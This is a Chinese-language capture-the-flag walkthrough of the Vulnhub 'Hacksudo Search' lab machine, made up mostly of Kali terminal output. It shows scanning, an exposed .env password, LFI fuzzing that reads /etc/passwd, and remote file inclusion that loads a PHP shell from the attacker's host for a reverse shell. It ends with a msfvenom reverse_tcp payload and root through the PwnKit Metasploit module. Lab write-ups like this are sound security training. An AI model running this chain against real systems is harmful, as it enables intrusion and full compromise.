Hacksudo Search识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor 192.168.56.100 08:00:27:f5:05:04 1 60 PCS Systemtechnik GmbH 192.168.56.162 08:00:27:b8:ce:1e 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.162
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ sudo nmap -sS -sV -sC -p- 192.168.56.162 -oN nmap_full_scan Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-24 21:30 EDTNmap scan report for bogon (192.168.56.162)Host is up (0.00013s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)| ssh-hostkey: | 2048 7b:44:7c:da:fb:e5:e6:1d:76:33:eb:fa:c0:dd:77:44 (RSA)| 256 13:2d:45:07:32:83:13:eb:4e:a1:20:f4:06:ba:26:8a (ECDSA)|_ 256 21:a1:86:47:07:1b:df:b2:70:7e:d9:30:e3:29:c2:e7 (ED25519)80/tcp open http Apache httpd 2.4.38 ((Debian))|_http-title: HacksudoSearch|_http-server-header: Apache/2.4.38 (Debian)MAC Address: 08:00:27:B8:CE:1E (Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 10.71 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)
获得Shell
──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ curl http://192.168.56.162/robots.txt/* find me * im number 1 search engine . just joking :) www.hacksudo.com ┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ nikto -h http://192.168.56.162- Nikto v2.1.6---------------------------------------------------------------------------+ Target IP: 192.168.56.162+ Target Hostname: 192.168.56.162+ Target Port: 80+ Start Time: 2023-04-24 22:26:53 (GMT-4)---------------------------------------------------------------------------+ Server: Apache/2.4.38 (Debian)+ The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ No CGI Directories found (use '-C all' to force check all possible dirs)+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.+ OSVDB-3268: /account/: Directory indexing found.+ OSVDB-3092: /account/: This might be interesting...+ OSVDB-3233: /icons/README: Apache default file found.+ /.env: .env file found. The .env file may contain credentials.+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host+ End Time: 2023-04-24 22:27:52 (GMT-4) (59 seconds)---------------------------------------------------------------------------+ 1 host(s) tested ********************************************************************* Portions of the server's headers (Apache/2.4.38) are not in the Nikto 2.1.6 database or are newer than the known string. Would you like to submit this information (*no server specific data*) to CIRT.net for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
nikto发现目录/account/,该目录下虽然有众多文件,但是访问这些文件,返回均为空。
nikto另外发现了/.env,
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ curl http://192.168.56.162/.env APP_name=HackSudoSearchAPP_ENV=localAPP_key=base64:aGFja3N1ZG8gaGVscCB5b3UgdG8gbGVhcm4gQ1RGICwgY29udGFjdCB1cyB3d3cuaGFja3N1ZG8uY29tL2NvbnRhY3QKAPP_DEBUG=falseAPP_URL=http://localhostLOG_CHANNEL=stackDB_CONNECTION=mysqlDB_HOST=127.0.0.1DB_PORT=3306DB_USERNAME=hiramanDB_PASSWORD=MyD4dSuperH3r0!
该文件包含了数据库连接用户名和密码,但是该用户名不能用于SSH
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ ssh hiraman@192.168.56.162 The authenticity of host '192.168.56.162 (192.168.56.162)' can't be established.ED25519 key fingerprint is SHA256:dzS9ujCpu8ohIPbqCaxf4e6gi5YSgBrhAI8srwr1giU.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '192.168.56.162' (ED25519) to the list of known hosts.hiraman@192.168.56.162's password: Permission denied, please try again.hiraman@192.168.56.162's password:
──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ gobuster dir -u http://192.168.56.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.js,.sh===============================================================Gobuster v3.5by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://192.168.56.162[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.5[+] Extensions: php,html,txt,bak,js,sh[+] Timeout: 10s===============================================================2023/04/24 22:31:27 Starting gobuster in directory enumeration mode===============================================================/.html (Status: 403) [Size: 279]/.php (Status: 403) [Size: 279]/images (Status: 301) [Size: 317] [--> http://192.168.56.162/images/]/index.php (Status: 200) [Size: 715]/search.php (Status: 200) [Size: 165]/submit.php (Status: 200) [Size: 165]/assets (Status: 301) [Size: 317] [--> http://192.168.56.162/assets/]/account (Status: 301) [Size: 318] [--> http://192.168.56.162/account/]/javascript (Status: 301) [Size: 321] [--> http://192.168.56.162/javascript/]/robots.txt (Status: 200) [Size: 75]/LICENSE (Status: 200) [Size: 1074]/search1.php (Status: 200) [Size: 2918]
Gobuster工具扫描出文件/search1.php,访问该文件,其中contact,作者给出提示,需要FUZZ参数,因此接下来用wfuzz工具进行FUZZING
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ wfuzz -c -u 'http://192.168.56.162/search1.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 288 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.********************************************************* Wfuzz 3.1.0 - The Web Fuzzer *********************************************************Target: http://192.168.56.162/search1.php?FUZZ=../../../../../etc/passwdTotal requests: 220560=====================================================================ID Response Lines Word Chars Payload =====================================================================000001129: 200 143 L 260 W 3797 Ch "me"
FUZZ出参数名称为me
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ curl http://192.168.56.162/search1.php?me=../../../../../../etc/passwd Home About Contact HackSudo Search box
JumpStation The web crawler with Google
root:x:0:0:root:/root:/bin/bashdaemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:*:2:2:bin:/bin:/usr/sbin/nologinsys:*:3:3:sys:/dev:/usr/sbin/nologinsync:*:4:65534:sync:/bin:/bin/syncgames:*:5:60:games:/usr/games:/usr/sbin/nologinman:*:6:12:man:/var/cache/man:/usr/sbin/nologinlp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:*:8:8:mail:/var/mail:/usr/sbin/nologinnews:*:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:*:13:13:proxy:/bin:/usr/sbin/nologinwww-data:*:33:33:www-data:/var/www:/usr/sbin/nologinbackup:*:34:34:backup:/var/backups:/usr/sbin/nologinlist:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:*:100:65534::/nonexistent:/usr/sbin/nologinsystemd-timesync:*:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinsystemd-network:*:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:*:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinhacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bashsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologinmessagebus:x:104:110::/nonexistent:/usr/sbin/nologinsshd:x:105:65534::/run/sshd:/usr/sbin/nologinmysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/falsemonali:x:1001:1001:,,,:/home/monali:/bin/bashjohn:x:1002:1002:,,,:/home/john:/bin/bashsearch:x:1003:1003:,,,:/home/search:/bin/bash Visit --> www.hacksudo.com
看是否存在SSH私钥文件
http://192.168.56.162/search1.php?me=../../../../../../home/search/.ssh/id_rsa
经过测试3个普通用户均不存在ssh私钥文件。
接下来看是否有远程文件包含漏洞:
http://192.168.56.162/search1.php?me=http://192.168.56.230:8000/test.txt
经过尝试,目标存在远程文件包含漏洞,因此在Kali linux端准备好shell.php文件,并启动http.server
访问下述URL:
http://192.168.56.162/search1.php?me=http://192.168.56.230:8000/shell.php
在Kali linux上得到目标主机反弹回来的shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ sudo nc -nlvp 5555 [sudo] password for kali: listening on [any] 5555 ...connect to [192.168.56.230] from (UNKNOWN) [192.168.56.162] 55864Linux HacksudoSearch 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux 22:00:50 up 40 min, 0 users, load average: 0.01, 1.18, 1.25USER TTY FROM LOGIN@ IDLE JCPU PCPU WHATuid=33(www-data) gid=33(www-data) groups=33(www-data)/bin/sh: 0: can't access tty; job control turned off$ which python/usr/bin/python$ python -c 'import pty;pty.spawn("/bin/bash")'www-data@HacksudoSearch:/$ cd /homecd /homewww-data@HacksudoSearch:/home$ ls -alhls -alhtotal 24Kdrwxr-xr-x 6 root root 4.0K Apr 15 2021 .drwxr-xr-x 18 root root 4.0K Apr 11 2021 ..drwxr-x--- 6 hacksudo hacksudo 4.0K Apr 15 2021 hacksudodrwxr-x--- 2 john john 4.0K Apr 13 2021 johndrwxr-x--- 2 monali monali 4.0K Apr 13 2021 monalidrwxr-x--- 2 search search 4.0K Apr 15 2021 search
提权
利用msfvenom工具生成payload,将payload上传至目标主机/tmp目录,然后执行该文件
─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcppayload => linux/x86/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (linux/x86/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Wildcard Targetmsf6 exploit(multi/handler) > set LHOST 192.168.56.230LHOST => 192.168.56.230msf6 exploit(multi/handler) > set LPORT 6666LPORT => 6666msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.56.230:6666 [*] Sending stage (989032 bytes) to 192.168.56.162[*] Meterpreter session 1 opened (192.168.56.230:6666 -> 192.168.56.162:33994) at 2023-04-24 22:51:21 -0400meterpreter > background [*] Backgrounding session 1...msf6 exploit(multi/handler) > search suggesterMatching Modules================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit SuggesterInteract with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggestermsf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggestermsf6 post(multi/recon/local_exploit_suggester) > show options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on SHOWDESCRIPTION false yes Displays a detailed description for the available exploitsmsf6 post(multi/recon/local_exploit_suggester) > set SESSION 1SESSION => 1msf6 post(multi/recon/local_exploit_suggester) > run[*] 192.168.56.162 - Collecting local exploits for x86/linux...[*] 192.168.56.162 - 167 exploit checks are being tried...[+] 192.168.56.162 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.[+] 192.168.56.162 - exploit/linux/local/pkexec: The service is running, but could not be validated.[+] 192.168.56.162 - exploit/linux/local/su_login: The target appears to be vulnerable.[*] Running check method for exploit 48 / 48[*] 192.168.56.162 - Valid modules for session 1:============================ # Name Potentially Vulnerable? Check Result - ---- ----------------------- ------------ 1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable. 2 exploit/linux/local/pkexec Yes The service is running, but could not be validated. 3 exploit/linux/local/su_login Yes The target appears to be vulnerable.
选择提权模块,然后提权
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcpmsf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec): Name Current Setting Required Description ---- --------------- -------- ----------- PKEXEC_PATH no The path to pkexec binary SESSION yes The session to run this module on WRITABLE_DIR /tmp yes A directory where we can write filesPayload options (linux/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.0.2.15 yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 x86_64msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230LHOST => 192.168.56.230msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888LPORT => 8888msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1SESSION => 1msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run[*] Started reverse TCP handler on 192.168.56.230:8888 [*] Running automatic check ("set AutoCheck false" to disable)[!] Verify cleanup of /tmp/.aqmsnondyug[+] The target is vulnerable.[*] Writing '/tmp/.esjvtiaf/vswplcef/vswplcef.so' (548 bytes) ...[!] Verify cleanup of /tmp/.esjvtiaf[*] Sending stage (3020772 bytes) to 192.168.56.162[+] Deleted /tmp/.esjvtiaf/vswplcef/vswplcef.so[+] Deleted /tmp/.esjvtiaf/.qbbgfqf[+] Deleted /tmp/.esjvtiaf[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.162:40940) at 2023-04-24 22:55:08 -0400meterpreter > shellProcess 1145 created.Channel 1 created.id uid=0(root) gid=0(root) groups=0(root),33(www-data)cd /rootlsnotes.txtroot.txtcat notes.txt _ _ _ _| |__ __ _ ___| | _____ _ _ __| | ___ ___ ___ __ _ _ __ ___| |__| '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ \ / __|/ _ \/ _` | '__/ __| '_ \| | | | (_| | (__| <\__ \ |_| | (_| | (_) | \__ \ __/ (_| | | | (__| | | ||_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/ |___/\___|\__,_|_| \___|_| |_|+-------------------------------------------------------------------------+hacksudo search Box created By vishal waghmarehttps://instagram.com/realvilutry hacksudo other box1.hacksudo 1.12.hacksudo 2 3.hacksudo 34.hacksudo aliens+----------------------------------+this box name is hacksudo search. it's my pleasure to create such box .+-----------------------------------+if any query or want any kinda support you can contact usemail: info@hacksudo.com visal@hacksudo.comweb : www.hacksudo.com +----------------------------+hacksudo search vulnerability:1. LFI ssh log poisioning / RFI on search1.php2. after geting shell or you can do ls -la in /var/www/html in .env there is password hint3. users are 3 to 4 so confused? do ssh one by one else do hydra with given password (MyD4dSuperH3r0!)4. hacksudo ssh login done now do privileged escalation , there is searchinstall.c searchinstall file which one have SUID permision and by read searchinstall.c there you can read install command which is triggerd . so try path veriable and you will get root access +++------rooted------------+++yes you roted box thats why you read thisbtw create your writeup how you solve this box and send to mei love to read your way how you solve this box+++---------+++-----------+++Signed out#vishal waghmarecat root.txt _ _ _ ____ _ | |__ __ _ ___| | _____ _ _ __| | ___ / ___| ___ __ _ _ __ ___| |__ | '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ \ \___ \ / _ \/ _` | '__/ __| '_ \ | | | | (_| | (__| <\__ \ |_| | (_| | (_) | ___) | __/ (_| | | | (__| | | ||_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/ |____/ \___|\__,_|_| \___|_| |_|You Successfully Hackudo search box rooted!!!flag={9fb4c0afce26929041427c935c6e0879}
STRIVE FOR PROGRESS,NOT FOR PERFECTION